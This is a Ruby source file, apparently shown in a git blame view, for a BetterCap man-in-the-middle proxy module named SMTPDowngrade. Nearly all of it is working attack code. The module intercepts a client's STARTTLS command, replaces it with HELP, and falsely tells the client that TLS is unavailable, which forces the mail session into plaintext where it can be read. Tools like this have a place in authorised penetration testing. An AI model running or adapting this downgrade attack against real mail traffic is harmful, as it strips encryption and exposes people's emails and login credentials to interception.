2018-02-02 22:22:43 +01:00
|
|
|
=begin
|
|
|
|
Author : @mgeeky
|
|
|
|
Email : mb@binary-offensive.com
|
|
|
|
This project is released under the GPL 3 license.
|
|
|
|
=end
|
|
|
|
|
|
|
|
class SMTPDowngrade < BetterCap::Proxy::TCP::Module
|
|
|
|
meta(
|
|
|
|
'Name' => 'SMTPDowngrade',
|
|
|
|
'Description' => 'Downgrades SMTP encryption by returning deny to STARTTLS request.',
|
|
|
|
'Version' => '1.0.0',
|
|
|
|
'Author' => 'mgeeky - mb@binary-offensive.com - https://github.com/mgeeky',
|
|
|
|
'License' => 'GPL3'
|
|
|
|
)
|
|
|
|
|
|
|
|
def on_response(event)
|
|
|
|
if @respondwith != nil
|
|
|
|
BetterCap::Logger.info "[#{'SMTP Downgrade'.green}] Lying that SMTP server does not support SSL/TLS."
|
|
|
|
event.data = @respondwith
|
|
|
|
@respondwith = nil
|
|
|
|
end
|
|
|
|
|
|
|
|
BetterCap::Logger.raw "\n#{BetterCap::StreamLogger.hexdump( event.data )}\n"
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_data(event)
|
|
|
|
@respondwith = smtp_parse_request(event)
|
|
|
|
end
|
|
|
|
|
|
|
|
def smtp_parse_request(event)
|
|
|
|
return nil if not event.data
|
|
|
|
|
2019-01-29 14:22:30 +01:00
|
|
|
if event.data =~ /^STARTTLS.*/
|
2018-02-02 22:22:43 +01:00
|
|
|
BetterCap::Logger.info "[#{'SMTP Downgrade'.green}] Intercepted STARTTLS command."
|
|
|
|
@respondwith = "454 4.7.0 TLS not available due to local problem\r\n"
|
|
|
|
|
|
|
|
event.data = "HELP\r\n"
|
|
|
|
end
|
|
|
|
|
|
|
|
BetterCap::Logger.raw "\n#{BetterCap::StreamLogger.hexdump( event.data )}\n"
|
|
|
|
end
|
|
|
|
end
|